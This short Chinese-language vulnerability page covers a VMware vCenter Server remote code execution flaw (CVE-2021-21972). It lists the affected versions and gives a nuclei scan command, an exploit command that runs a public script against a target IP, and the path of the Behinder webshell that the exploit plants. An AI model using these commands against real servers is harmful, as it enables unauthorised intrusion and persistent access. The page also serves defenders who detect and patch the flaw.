## 漏洞概述
攻击者可通过访问web管理端向vCenter Server发送请求从而在操作系统上执行任意命令或者上传一个webshell到vcenter服务器的任意位置执行.
## 漏洞影响
“`http
VMware vCenter Server 7.0系列 < 7.0.U1c
VMware vCenter Server 6.7系列 < 6.7.U3l
VMware vCenter Server 6.5系列 < 6.5 U3n
VMware ESXi 7.0系列 < ESXi70U1c-17325551
VMware ESXi 6.7系列 < ESXi670-202102401-SG
VMware ESXi 6.5系列 < ESXi650-202102101-SG
``` ## POC ```bash
nuclei -tags vmware -t cves/ -l urls.txt Goby(需导入佩奇文库的POC)
``` ## EXP [@NS-Sp4ce](https://github.com/NS-Sp4ce/CVE-2021-21972) ```bash
python CVE-2021-21972.py -url https://192.168.2.1
``` `payload`文件夹内的`tar`文件为默认冰蝎3 webshell ```http
https://domain.com/ui/resources/shell.jsp
```
[点我下载](/Gr33kLibrary/download_tool/91/)
请登录后查看评论内容